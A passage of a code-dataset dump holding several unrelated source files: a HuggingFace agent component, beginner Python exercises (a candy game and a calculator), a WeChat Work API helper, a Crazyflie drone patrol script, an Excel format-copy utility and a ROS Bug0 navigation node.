xai_component\n\nfrom transformers import OpenAiAgent\nfrom transformers import Tool\n\nfrom io import BytesIO\nfrom PIL import Image\nimport tempfile\n\n@xai_component\nclass HfAgentMakeTool(Component):\n run_tool: BaseComponent\n \n name: InCompArg[str]\n description: InCompArg[str]\n output_ref: InCompArg[str]\n \n tool_ref: OutArg[Tool]\n input_ref: OutArg[str]\n \n def execute(self, ctx) -> None:\n other_self = self\n \n class CustomTool(Tool):\n name = other_self.name.value\n description = other_self.description.value\n inputs = [\"text\"]\n output = [\"text\"]\n \n def __call__(self, prompt):\n \n other_self.input_ref.value = prompt\n next = other_self.run_tool\n while next:\n next = next.do(ctx)\n return other_self.output_ref.value\n \n self.tool_ref.value = CustomTool()\n \n \n@xai_component\nclass HfAgentInit(Component):\n agent_type: InCompArg[str]\n \n tools: InArg[list]\n \n\n def execute(self, ctx) -> None:\n if self.agent_type.value == 'openai':\n agent = OpenAiAgent(model=\"text-davinci-003\", additional_tools=self.tools.value)\n ctx['hf_agent'] = agent\n\n\n@xai_component\nclass HfAgentRun(Component):\n prompt: InCompArg[str]\n document: InArg[any]\n response_text: OutArg[str]\n response_file: OutArg[str]\n \n \n def execute(self, ctx) -> None:\n agent = ctx['hf_agent']\n \n if self.document.value:\n if isinstance(self.document.value, bytes):\n image_file = BytesIO(self.document.value)\n self.document.value = Image.open(image_file)\n ret = agent.run(self.prompt.value, document=self.document.value)\n else:\n ret = agent.run(self.prompt.value)\n \n if isinstance(ret, str):\n self.response_text.value = ret\n elif isinstance(ret, Image.Image):\n f = tempfile.NamedTemporaryFile()\n ret.save(f.name + '.png')\n self.response_file.value = f.name + '.png'\n\n@xai_component\nclass HfReadImage(Component):\n file_path: InCompArg[str]\n out_image: OutArg[Image.Image]\n \n def execute(self, ctx) -> None:\n self.out_image.value = 
Image.open(self.file_path.value)\n","repo_name":"XpressAI/xai-hfagent","sub_path":"hf_agents_components.py","file_name":"hf_agents_components.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39672912194","text":"from max import max_of\n\nprint(\"배열의 최댓값 구하기\")\nprint('End 입력 시, 종료')\n\nnumber = 0\nx = []\nwhile True:\n s = input(f'x[{number}]값을 입력하세요.')\n if s == 'End' : \n break \n x.append(int(s))\n number+=1\n\nprint(f'x의 갯수는 {number}이고, 최댓값은 {max_of(x)}입니다.')\n ","repo_name":"S2chanse/codeTestAlgorithm","sub_path":"chap02/max_of_test_input.py","file_name":"max_of_test_input.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22663041638","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@File : api.py\n@Date : 2023-03-08\n\n企业微信开放API接口\n\"\"\"\nfrom __future__ import print_function, unicode_literals, absolute_import, division\nimport requests\n\n\ndef get_access_token(corpid, corpsecret):\n \"\"\"\n 获取access_token\n https://developer.work.weixin.qq.com/document/path/91039\n\n :param corpid: 企业ID\n :param corpsecret: 应用的凭证密钥\n :return:\n {\n \"errcode\": 0,\n \"errmsg\": \"ok\",\n \"access_token\": \"accesstoken000001\",\n \"expires_in\": 7200\n }\n \"\"\"\n url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\n params = {\n 'corpid': corpid,\n 'corpsecret': corpsecret\n }\n\n res = requests.get(url, params=params)\n return res.json()\n\n\ndef send_message(access_token, body):\n \"\"\"\n 发送应用消息\n https://developer.work.weixin.qq.com/document/path/90236\n\n :param access_token:\n :param body: 消息体\n :return:\n\n {\n \"errcode\" : 0,\n \"errmsg\" : \"ok\",\n \"invaliduser\" : \"userid1|userid2\",\n \"invalidparty\" : \"partyid1|partyid2\",\n \"invalidtag\": \"tagid1|tagid2\",\n \"unlicenseduser\" : \"userid3|userid4\",\n \"msgid\": \"xxxx\",\n \"response_code\": \"xyzxyz\"\n }\n \"\"\"\n url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send'\n\n params = {\n 'access_token': access_token,\n }\n\n res = requests.post(url, params=params, json=body)\n return res.json()\n","repo_name":"mouday/domain-admin","sub_path":"domain_admin/utils/open_api/work_weixin_api.py","file_name":"work_weixin_api.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":1065,"dataset":"github-code","pt":"54"} +{"seq_id":"27780946865","text":"# Создайте программу для игры с конфетами человек против человека.\n# Условие задачи: На столе лежит 2021 конфета.\n# Играют два игрока делая ход друг после друга.\n# Первый ход определяется жеребьёвкой. За один ход можно забрать не более чем 28 конфет.\n# Все конфеты оппонента достаются сделавшему последний ход.\n# Сколько конфет нужно взять первому игроку, чтобы забрать все конфеты у своего конкурента?\n#\n# a) Добавьте игру против бота\n# b) Подумайте как наделить бота \"\"интеллектом\"\"\n\n# Стратегия игры: Если мой ход первый то забрать 6 конфет и после каждого хода противника брать количество конфет\n# 28 - ход противника.\n# Если хожу вторым, то после каждого хода противника брать количество конфет\n# 28 - ход противника.\nimport random\n\n\n# Приветствие и выбор противника\ndef choice_user():\n print \\\n ('Приветствую вас, игроки! 
Меня зовут Антон!\\n'\n 'Правила игры простые: На столе лежит 2021 конфета.\\n'\n 'За один ход можно забрать не более чем 28 конфет.'\n 'Чей ход последний, тот выиграл и забирает все конфеты!')\n choice_user = input \\\n ('Если вы хотите играть со мной в эту игру,\\n'\n 'введите: Y'\n '\\nЕсли вы хотите играть вдвоем, введите: N\\n')\n if choice_user.lower() == 'y':\n complexity = int(input('Выберитe уровень сложности\\nЛегкий - введите 1\\nСложный - введите 2\\n'))\n if complexity == 1:\n return 'auto'\n elif complexity == 2:\n return 'auto_smart'\n else:\n print('Не корректный ввод')\n return choice_user()\n elif choice_user.lower() == 'n':\n return 'hand'\n else:\n print('Не корректный ввод')\n return choice_user()\n\n\n# Ввод имени игрока\ndef hand_play():\n name = input('Введите имя игрока: ')\n return name\n\n\n# Чей следущий ход\ndef play_label(number_label, name_one=1, name_two=2):\n if number_label == 0:\n print(f'Ход игрока {name_two}:')\n number_label = 1\n elif number_label == 1:\n print(f'Ход игрока {name_one}:')\n number_label = 0\n else:\n return\n return number_label\n\n\n# Поговори с Антоном\ndef voice_anton():\n voice_list = \\\n ['Не тормози, это простая игра!', 'Мне кажется я уже выиграл!',\n 'Эту цифру я видел во сне', 'Твой ход дружище!', 'А у тебя конфеты с какой начинкой?']\n print(random.choice(voice_list))\n\n\n# Ход бота Антон\ndef auto_player():\n move = random.randint(1, 28)\n print(f'Я возьму {move} конфет(ы)')\n voice_anton()\n return move\n\n# Ход умного бота Антон\ndef smart_auto_player(move_user):\n fix_number = 28\n if move_user < fix_number:\n move = fix_number - move_user\n print(f'Я возьму {move} конфет(ы)')\n voice_anton()\n return move\n elif move_user == fix_number:\n move = fix_number\n print(f'Я возьму {move} конфет(ы)')\n voice_anton()\n return move\n\n\n# Ход игрока\ndef play():\n players_move_in = int(input())\n return players_move_in\n\n\n# Метод подсчета оставшихся конфет\ndef players_move(user_numbers, volume):\n if user_numbers <= 28:\n volume = volume - user_numbers\n return volume\n else:\n print('Число не может превышать 28! 
Вы проиграли!')\n return game(choice_user())\n\n\n# Кто победил\ndef winner(number_label, name_p_one, name_p_two):\n if number_label == 0:\n print(f'Все конфеты достаются победителю - {name_p_two}!!!')\n else:\n print(f'Все конфеты достаются победителю - {name_p_one}!!!')\n\n\n# Игра с конфетами\ndef game(choice):\n max_of_one_step = 28\n candy_bank = 2021\n flag = random.randint(0, 1)\n names = hand_play()\n if choice == 'hand':\n names_two = hand_play()\n elif choice == 'auto':\n names_two = 'Anton'\n elif choice == 'auto_smart':\n names_two = 'Anton'\n flag = 1\n game_while(max_of_one_step, candy_bank, names, names_two, choice, flag)\n\n# Цикл игры\ndef game_while(max_of_one_step, candy_bank, names, names_two, choice, flag):\n while candy_bank > max_of_one_step:\n if flag == 1:\n flag = play_label(flag, names, names_two)\n number_selected_player = play()\n candy_bank = players_move(number_selected_player, candy_bank)\n else:\n if choice == 'auto':\n flag = play_label(flag, names, names_two)\n candy_bank = players_move(auto_player(), candy_bank)\n elif choice == 'auto_smart':\n flag = play_label(flag, names, names_two)\n candy_bank = players_move(smart_auto_player(number_selected_player), candy_bank)\n elif choice == 'hand':\n flag = play_label(flag, names, names_two)\n candy_bank = players_move(play(), candy_bank)\n print(f'Число конфет на столе: {candy_bank}')\n winner(flag, names, names_two)\n# Добрый день, Сергей. Если вы дочитали до этого места - вы реально крутой преподаватель))))\n# Буду благодарен если дадите развернутый комментарий по дз. Для человека без опыта это было бы очень вдохновляюще\n# Спасибо :-)))\n\n# Запуск игры\ngame(choice_user())\n","repo_name":"Georgvit/PythonOneClass","sub_path":"Home_work/h_w_23.py","file_name":"h_w_23.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5247255212","text":"import math\r\nimport os\r\nfrom time import sleep\r\n\r\n# Declaração de Variáveis \r\ncolor = {'limpa':\"\\033[m\", 'azul':'\\033[34m', 'amarelo':'\\033[33m'}\r\nspace = ' '* 35\r\nopcao = 1\r\n\r\n# Declaração funções\r\ndef soma(a, b):\r\n soma = a + b\r\n return soma\r\n\r\ndef subtracao(a, b):\r\n subtr = a - b\r\n return subtr\r\n\r\ndef multiplicacao(a, b):\r\n multip = a * b\r\n return multip\r\n\r\ndef divisao(a, b):\r\n divisao = a / b\r\n return divisao\r\n\r\ndef limpar():\r\n os.system('CLS')\r\n\r\n\r\n# Calculadora \r\nwhile opcao != 0:\r\n limpar()\r\n print('=-' * 40, '\\n{}CALCULADORA\\n'.format(space), '=-' * 40)\r\n print('[ 1 ] SOMA \\n[ 2 ] SUBTRAÇÃO\\n[ 3 ] MULTIPLICAÇÃO\\n[ 4 ] DIVISÃO\\n\\n[ 0 ] Sair')\r\n opcao = int(input('Selecione uma das opções: '))\r\n \r\n if opcao == 1:\r\n print('\\nSOMA\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n soma(num1, num2)\r\n sleep(10)\r\n \r\n elif opcao == 2:\r\n print('\\nSUBTRAÇÃO\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n subtracao(num1, num2)\r\n sleep(10)\r\n \r\n elif opcao == 3:\r\n print('\\nMULTIPLICAÇÃO\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n multiplicacao(num1, num2)\r\n sleep(10)\r\n \r\n elif opcao == 4:\r\n print('\\nDIVISÃO\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n divisao(num1, 
num2)\r\n sleep(10)\r\n \r\n elif opcao == 0:\r\n break\r\n \r\n else:\r\n print('Por favor, digite uma opção válida!!')\r\n sleep(2)","repo_name":"rafaelbazolli/Python","sub_path":"ExemploCalculadora.py","file_name":"ExemploCalculadora.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32130959256","text":"''' This program will launch a patrol between differents positions with virtuals obstacles'''\nimport time\nimport cflib.crtp\nfrom cflib.crazyflie.swarm import CachedCfFactory\nfrom cflib.crazyflie.swarm import Swarm\nfrom math import cos, sin\nfrom random import randint, random\n\nglobal Dict_link_Sec_drone\nDict_link_Sec_drone={}\nflying_time=30\n# Change uris and sequences according to your setup\nURI1 = 'radio://0/80/2M/E7E7E7E703'\n\n\n# List of URIs, comment the one you do not want to fly\nuris = {\n URI1,\n}\n\n\ndef wait_for_param_download(scf):\n while not scf.cf.param.is_updated:\n time.sleep(1.0)\n print('Parameters downloaded for', scf.cf.link_uri)\n\n\nclass Sec_drone:\n def __init__(self,liste_drone,leader):\n self.liste_drone=liste_drone\n #Agent Optitrack position\n self.cam_X=0\n self.cam_Y=0\n self.cam_Z=0\n #flags\n self.curent_obj=[0,0]\n self.Yawc=0\n self.pitch_command=0\n self.roll_command=0\n self.flag=False\n self.vertical_velocity_command=0\n self.yaw_velocity_command=0\n self.cam_position_received=0\n #Previous position (to compute velocity)\n self.previous_X=0\n self.previous_Y=0\n self.previous_Z=0\n #self.set_cam_coord(x,y,0)\n self.cam_yaw=0\n #Voisin proch\n self.leader=leader\n self.control_enable=0 \n self.patrol_st=0\n self.i=0\n self.tmp_point=[0,0,0.4]\n #fly modification\n self.voisin=[[0.2,0.2]] #list of obstacles\n self.K_objectif=1 #strength of the objectif\n self.disance_unit=0.20 #distance between the drone and the temporary objectif\n self.urgence= 0.4 #distance of emergency\n self.K_urgence=0.7 #strength of the emergency\n self.hauteur=0.3 #height of the drone\n\n def set_cam_coord(self,X,Y,Z):\n ''' function which set the position atributes of the drone'''\n self.cam_X=X\n self.cam_Y=Y\n self.cam_Z=Z\n\n def set_previous_coord(self,X,Y,Z):\n ''' function which set the position previous atributes of the drone'''\n self.previous_X=X \n self.previous_Y=Y\n self.previous_Z=Z\n\n def get_vitesse_X_Y_Z(self):\n ''' function which return the velocity of the drone'''\n return[(self.cam_X-self.previous_X)/0.02,(self.cam_Y-self.previous_Y)/0.02,(self.cam_Z-self.previous_Z)/0.02]\n\n def get_Cam_X_Y_Z(self):\n ''' function which return the position of the drone'''\n return [self.cam_X,self.cam_Y,self.cam_Z]\n \n def calcul_distance(self,x,y):\n ''' function which return the distance between the drone and the object'''\n return abs(self.cam_X-x)+abs(self.cam_Y-y)\n \n def objectif(self):\n ''' function which return the objectif of the drone depending of the value of i and if too far, launch the calcul\n of the new_temporary objectif'''\n if abs(self.cam_X-self.curent_obj[0])+abs(self.cam_Y-self.curent_obj[1])<0.15:\n if self.i==0:\n self.curent_obj=[0,1]\n self.i=1\n else:\n self.curent_obj=[0,-1]\n self.i=0\n else:\n self.new_calcul_obstacle([self.curent_obj[0],self.curent_obj[1],1])\n \n def force_objectif(self,position_obj):\n '''calcul the force of the objectif'''\n K=self.K_objectif\n norme=((self.cam_X-position_obj[0])**2+(self.cam_Y-position_obj[1])**2)**(1/2)\n u=[(self.cam_X-position_obj[0])/norme, (self.cam_Y-position_obj[1])/norme]\n 
return [-u[0]*K,-u[1]*K]\n\n\n def calcul_force_repulsion(self,position_ob,urgence,distance,K):\n '''calcul the force of the repulsion of obstacles'''\n norme=((self.cam_X-position_ob[0])**2+(self.cam_Y-position_ob[1])**2)**(1/2)\n u=[(self.cam_X-position_ob[0])/norme, (self.cam_Y-position_ob[1])/norme]\n return [u[0]*K*(urgence/distance)**2,u[1]*K*(urgence/distance)**2]\n\n\n def new_calcul_obstacle(self,objectif):\n ''' function which calculate the new movement of the drone'''\n force=self.force_objectif([objectif[0],objectif[1]])\n distance_unit=self.disance_unit\n urgence =self.urgence\n K_urgence=self.K_urgence\n voisin_urgence=[]\n for voisin in self.voisin:\n d=self.calcul_distance(voisin[0],voisin[1])\n if d 0:\n time.sleep(n_seconds_to_sleep)\n\n\n # シート名並び順を指定することも可能\n if sorted_sheet_names_list is None:\n sorted_sheet_names_list = sheet_names_list\n\n # 一時的excel格納ディレクトリを中身ごと削除\n if del_tmp_dir:\n shutil.rmtree(tmp_output_excel_dir_path)\n\n\n # シートの整理\n # シートを一旦ロードする\n output_wb = px.load_workbook(output_excel_path)\n\n # シートを並び替える\n n_sheets = len(output_wb.sheetnames)\n for tmp_sheet_name in sorted_sheet_names_list:\n output_wb.move_sheet(output_wb[tmp_sheet_name], offset=n_sheets)\n\n # デフォルトで作成される不要な1つ目のシートを削除する\n output_wb.remove(output_wb.worksheets[0])\n\n # 保存\n output_wb.save(output_excel_path)\n\n\ndef copy_excel_format_parallel(\n ceih_list,\n output_excel_path,\n tmp_output_excel_dir_path='./tmp_output_excel/',\n parallel_method='joblib_multithreads',\n n_jobs=1,\n copy_sheet_method='xlwings',\n sorted_sheet_names_list=None,\n del_tmp_dir=True,\n n_seconds_to_sleep=0,\n cef_manual_set_rows=None,\n cef_force_dimension_copy=False,\n cef_debug_mode=False,\n write_index=False,\n write_header=True,\n copy_values=False\n ):\n \"\"\"\n 並列処理を行い, 一時的な書式設定済みのexcelファイルを出力する.\n 一時的に出力した複数のexcelファイルをまとめて複数シートを持つ1つのexcelファイルとする.\n\n Args:\n ceih_list: list of CopyExcelInfoHolder object\n list of CopyExcelInfoHolder object\n \n output_excel_path: str\n output excel file path\n \n tmp_output_excel_dir_path: str, optional(default='./tmp_output_excel/')\n temporary output excel file path\n \n parallel_method: str, optional(default='joblib_multithreads')\n 'joblib_multithreads' or 'multiprocess'\n parallel method\n \n n_jobs: int, optional(default=1)\n number of workers\n \n copy_sheet_method: str, optional(default='xlwings')\n xlwings or win32com\n \n sorted_sheet_names_list: list of str\n sorted sheet names\n \n del_tmp_dir: bool, optional(default=True)\n delete temporary directory\n \n n_seconds_to_sleep: float, optional(default=True)\n Number of seconds to sleep for low spec PCs.\n \n cef_manual_set_rows: list of int[min_row, max_row] or None, optional(default=None)\n 書式コピーを行う行数をマニュアルで指定する.\n\n cef_force_dimension_copy: bool, optional(default=False)\n 強制的に行と列の幅などをコピー, 反映させる.\n\n cef_debug_mode: bool, optional(default=False)\n デバッグモード.\n \n write_index: bool, optional(default=False)\n indexを書き込むかどうか.\n \n write_header: bool, optional(default=False)\n headerを書き込むかどうか.\n \n copy_values: bool, optional(default=False)\n 値のコピーを行うかどうか.\n \"\"\"\n\n # 並列処理を行い, 一時的な書式設定済みのexcelファイルを出力する.\n output_temporary_excel_parallel(\n ceih_list = ceih_list,\n tmp_output_excel_dir_path = tmp_output_excel_dir_path,\n parallel_method = parallel_method,\n n_jobs = n_jobs,\n cef_manual_set_rows = cef_manual_set_rows,\n cef_force_dimension_copy = cef_force_dimension_copy,\n cef_debug_mode = cef_debug_mode,\n write_index = write_index,\n write_header = write_header,\n copy_values = copy_values\n )\n \n # 
一時的に出力した複数のexcelファイルをまとめて複数シートを持つ1つのexcelファイルとする.\n copy_excel_format_from_temporary_files(\n ceih_list = ceih_list,\n output_excel_path = output_excel_path,\n tmp_output_excel_dir_path = tmp_output_excel_dir_path,\n copy_sheet_method = copy_sheet_method,\n sorted_sheet_names_list = sorted_sheet_names_list,\n del_tmp_dir = del_tmp_dir,\n n_seconds_to_sleep = n_seconds_to_sleep\n )\n\n\n\n# --------------------------------------------------------------------------------\n# Classes\n# --------------------------------------------------------------------------------\n\n\n# CopyExcelInfoHolder\nclass CopyExcelInfoHolder():\n def __init__(\n self,\n template_excel_path,\n template_sheet_name,\n output_sheet_name,\n df\n ): \n self.template_excel_path = template_excel_path\n self.template_sheet_name = template_sheet_name\n self.output_sheet_name = output_sheet_name\n self.df = df\n\n\n# CopyExcelFormat\nclass CopyExcelFormat():\n \"\"\"\n Excel sheetにpandas.DataFrameを書式付きで書き込む.\n\n Attributes:\n input_ws: openpyxl.worksheet.worksheet.Worksheet\n 書式コピー元worksheetオブジェクト.\n \n output_ws: openpyxl.worksheet.worksheet.Worksheet\n コピー先worksheetオブジェクト.\n \n df: pandas.DataFrame\n 書き込むDataFrame.\n \n manual_set_rows: list of int[min_row, max_row] or None, optional(default=None)\n 書式コピーを行う行数をマニュアルで指定する.\n\n force_dimension_copy: bool, optional(default=False)\n 強制的に行と列の幅などをコピー, 反映させる.\n\n debug_mode: bool, optional(default=False)\n デバッグモード.\n \n Example:\n # CopyExcelFormatインスタンスの作成\n cef = CopyExcelFormat(\n input_ws = input_ws, # 書式コピー元wsオブジェクト(要修正)\n output_ws = output_ws,\n df = df,\n manual_set_rows = None,\n force_dimension_copy = False,\n debug_mode = False\n )\n\n # 書式書き込みの実行\n cef.write_df2formatted_sheet(\n write_index = False,\n write_header = False,\n copy_values = False\n )\n \"\"\"\n\n def __init__(\n self,\n input_ws=None,\n output_ws=None,\n df=None,\n manual_set_rows=None,\n force_dimension_copy=False,\n debug_mode=False\n ):\n \"\"\"\n CopyExcelFormatクラスのコンストラクタ.\n \"\"\"\n\n self.set_input_ws(input_ws)\n self.set_output_ws(output_ws)\n self.set_df(df)\n self.manual_set_rows = manual_set_rows\n self.force_dimension_copy = force_dimension_copy\n self.debug_mode = debug_mode\n\n if self.debug_mode:\n self.init_time = time.time()\n \n\n def set_input_ws(self, input_ws=None):\n self.input_ws = input_ws\n\n\n def set_output_ws(self, output_ws=None):\n self.output_ws = output_ws\n \n\n def set_df(self, df=None):\n \"\"\"\n pandas.DataFrameをセットする\n\n Args:\n df: pandas.DataFrame \n \"\"\"\n\n self.df = df\n \n if df is None:\n self.df_shape_list = None\n self.df_n_rows = None\n self.df_n_cols = None\n \n else:\n self.df_shape_list = list(df.shape)\n self.df_n_rows = self.df_shape_list[0]\n self.df_n_cols = self.df_shape_list[1]\n\n\n # private method\n def __copy_sheet_format(self, copy_values=False):\n \"\"\"\n Excel sheetの書式を条件付き含めてコピーし, 別のsheetに反映させる.\n \n Args: \n copy_values: bool, optional(default=False)\n 値のコピーを行うかどうか.\n \"\"\"\n \n if self.manual_set_rows is None:\n\n # 書式のコピー\n for row in self.input_ws.rows:\n for input_cell in row:\n\n # 値コピーする場合\n if copy_values:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column,\n value=input_cell.value\n )\n \n # 値コピーしない場合\n else:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column\n )\n\n # cellにスタイルが指定されていた場合\n if input_cell.has_style:\n output_cell.font = copy.copy(input_cell.font)\n output_cell.border = copy.copy(input_cell.border)\n output_cell.fill = 
copy.copy(input_cell.fill)\n output_cell.number_format = copy.copy(input_cell.number_format)\n output_cell.protection = copy.copy(input_cell.protection)\n output_cell.alignment = copy.copy(input_cell.alignment)\n\n del input_cell, output_cell\n gc.collect()\n \n elif type(self.manual_set_rows) == list:\n\n # 書式のコピー\n # manual_set_rows = [min_row, max_row]\n for row in self.input_ws.iter_rows(min_row=self.manual_set_rows[0], max_row=self.manual_set_rows[1]):\n for input_cell in row:\n\n # 値コピーする場合\n if copy_values:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column,\n value=input_cell.value\n )\n \n # 値コピーしない場合\n else:\n output_cell = self.output_ws.cell(\n row=input_cell.row,\n column=input_cell.column\n )\n\n # cellにスタイルが指定されていた場合\n if input_cell.has_style:\n output_cell.font = copy.copy(input_cell.font)\n output_cell.border = copy.copy(input_cell.border)\n output_cell.fill = copy.copy(input_cell.fill)\n output_cell.number_format = copy.copy(input_cell.number_format)\n output_cell.protection = copy.copy(input_cell.protection)\n output_cell.alignment = copy.copy(input_cell.alignment)\n\n del input_cell, output_cell\n gc.collect()\n\n else:\n print('error: manual set rows type error.')\n \n\n # 処理時間表示\n if self.debug_mode:\n print('to copy cell format end.')\n get_elapsed_time(self.wd2fs_start_time, print_time=True)\n print()\n\n\n # 条件付き書式のコピー\n self.output_ws.conditional_formatting = copy.copy(self.input_ws.conditional_formatting)\n\n # その他諸々のコピー\n # self.output_ws.conditional_formatting = self.input_ws.conditional_formatting\n self.output_ws.page_margins = copy.copy(self.input_ws.page_margins)\n self.output_ws.page_setup = copy.copy(self.input_ws.page_setup)\n self.output_ws.col_breaks = copy.copy(self.input_ws.col_breaks)\n self.output_ws.row_breaks = copy.copy(self.input_ws.row_breaks)\n self.output_ws.sheet_format = copy.copy(self.input_ws.sheet_format)\n self.output_ws.sheet_properties = copy.copy(self.input_ws.sheet_properties)\n self.output_ws._print_area = copy.copy(self.input_ws._print_area)\n self.output_ws.views = copy.copy(self.input_ws.views)\n\n # セル結合状態をコピー, 反映させる.\n for cell_range in self.input_ws.merged_cells.ranges:\n self.output_ws.merge_cells(range_string=cell_range.coord)\n\n # 強制的に行と列の幅をコピー, 反映させる.\n if self.force_dimension_copy:\n\n # 列の幅と表示非表示をコピー\n for col_idx in range(self.input_ws.max_column):\n col_name = get_column_letter(col_idx + 1)\n\n # 列の幅\n self.output_ws.column_dimensions[col_name].width = copy.copy(self.input_ws.column_dimensions[col_name].width)\n\n # 表示非表示\n self.output_ws.column_dimensions[col_name].hidden = copy.copy(self.input_ws.column_dimensions[col_name].hidden)\n\n # 行の高さと表示非表示をコピー\n for row_idx in range(self.input_ws.max_row):\n row_name = row_idx + 1\n\n # 行の高さ\n self.output_ws.row_dimensions[row_name].height = copy.copy(self.input_ws.row_dimensions[row_name].height)\n\n # 表示非表示\n self.output_ws.row_dimensions[row_name].hidden = copy.copy(self.input_ws.row_dimensions[row_name].hidden)\n \n else:\n\n # 列の幅と表示非表示をコピー\n for col_name, col_obj in self.input_ws.column_dimensions.items():\n\n # 列の幅\n self.output_ws.column_dimensions[col_name].width = copy.copy(col_obj.width)\n\n # 表示非表示\n self.output_ws.column_dimensions[col_name].hidden = copy.copy(col_obj.hidden)\n\n # 行の高さと表示非表示をコピー\n for row_name, row_obj in self.input_ws.row_dimensions.items():\n\n # 行の高さ\n self.output_ws.row_dimensions[row_name].height = copy.copy(row_obj.height)\n\n # 表示非表示\n self.output_ws.row_dimensions[row_name].hidden = 
copy.copy(row_obj.hidden)\n\n \n # private method\n def __write_df2sheet(self, write_index=False, write_header=False):\n \"\"\"\n Excel sheetにpandas.DataFrameを書き込む.\n \n Args:\n write_index: bool, optional(default=False)\n indexを書き込むかどうか.\n \n write_header: bool, optional(default=False)\n headerを書き込むかどうか.\n \"\"\"\n \n # DataFrameを1行ずつ書き込む.\n for df_row in dataframe_to_rows(self.df, index=write_index, header=write_header):\n self.output_ws.append(df_row)\n \n\n def write_df2formatted_sheet(self, write_index=False, write_header=True, copy_values=False):\n \"\"\"\n Excel sheetにpandas.DataFrameを書式付きで書き込む.\n\n Args: \n write_index: bool, optional(default=False)\n indexを書き込むかどうか.\n \n write_header: bool, optional(default=False)\n headerを書き込むかどうか.\n \n copy_values: bool, optional(default=False)\n 値のコピーを行うかどうか.\n \"\"\"\n\n if self.debug_mode:\n self.wd2fs_start_time = time.time()\n\n print('*' * 80)\n print('sheet name: {}'.format(str(self.output_ws.title)))\n print()\n\n # DataFrameの書き込み\n try:\n\n # DataFrameの書き込み\n self.__write_df2sheet(\n write_index = write_index,\n write_header = write_header\n )\n\n except Exception as e:\n print('error: write df to sheet.')\n print(e)\n\n # 処理時間表示\n if self.debug_mode:\n print('to write df to sheet end.')\n get_elapsed_time(self.wd2fs_start_time, print_time=True)\n print()\n\n # 書式のコピー \n try:\n \n # 書式のコピー\n self.__copy_sheet_format(\n copy_values = copy_values\n )\n\n except Exception as e:\n print('error: copy sheet format.')\n print(e)\n \n # 処理時間表示\n if self.debug_mode:\n print('to copy format end.')\n get_elapsed_time(self.wd2fs_start_time, print_time=True)\n print()\n print('*' * 80)\n print()\n\n\n\n \n\n\n\n","repo_name":"laplaciannin102/copy_excel_format","sub_path":"copy_excel_format/excel_module.py","file_name":"excel_module.py","file_ext":"py","file_size_in_byte":35204,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23173950525","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom sensor_msgs.msg import LaserScan\nimport math\n\nclass Bug0:\n def __init__(self):\n rospy.init_node('bug0')\n rospy.Subscriber('/scan', LaserScan, self.scan_callback)\n rospy.Subscriber('/odom', Odometry, self.odom_callback)\n self.pub = rospy.Publisher('/cmd_vel', Twist, queue_size=1)\n self.rate = rospy.Rate(10) # Hz\n self.dist_tol = 0.1 # m\n self.angle_tol = math.pi/30 # radians\n self.goal = None\n self.obstacle = None\n self.odom = None\n self.cmd_vel = Twist()\n rospy.spin()\n\n def odom_callback(self, msg):\n self.odom = msg.pose.pose\n\n def scan_callback(self, msg):\n min_range = msg.range_max\n min_angle = None\n for i, r in enumerate(msg.ranges):\n if r < min_range:\n min_range = r\n min_angle = msg.angle_min + i * msg.angle_increment\n self.obstacle = (min_range, min_angle)\n\n def set_goal(self, x, y):\n self.goal = (x, y)\n self.cmd_vel.linear.x = 0.5\n self.cmd_vel.angular.z = 0\n self.pub.publish(self.cmd_vel)\n self.rate.sleep()\n\n\n def bug0(self):\n while not rospy.is_shutdown():\n if self.goal is None or self.odom is None or self.obstacle is None:\n self.rate.sleep()\n continue\n dist = math.sqrt((self.goal[0]-self.odom.position.x)**2 + (self.goal[1]-self.odom.position.y)**2)\n if dist < self.dist_tol:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = 0\n self.pub.publish(self.cmd_vel)\n break\n if self.obstacle[0] > dist:\n angle_to_goal = math.atan2(self.goal[1]-self.odom.position.y, 
self.goal[0]-self.odom.position.x)\n angle_diff = angle_to_goal - math.atan2(self.odom.orientation.y, self.odom.orientation.x)\n if angle_diff > math.pi:\n angle_diff -= 2*math.pi\n elif angle_diff < -math.pi:\n angle_diff += 2*math.pi\n if abs(angle_diff) > self.angle_tol:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = angle_diff\n self.pub.publish(self.cmd_vel)\n else:\n self.cmd_vel.linear.x = 0.5\n self.cmd_vel.angular.z = 0\n self.pub.publish(self.cmd_vel)\n else:\n angle_to_obstacle = self.obstacle[1]\n if abs(angle_to_obstacle) < math.pi/2:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = -0.5\n else:\n self.cmd_vel.linear.x = 0\n self.cmd_vel.angular.z = 0.5\n self.pub.publish(self.cmd_vel)\n self.rate.sleep()\n\n def run(self):\n while not rospy.is_shutdown():\n self.bug0()\n self.rate.sleep()\n\nif __name__ == '__main__':\n try:\n bug0_node = Bug0()\n bug0_node.run()\n except rospy.ROSInterruptException:\n 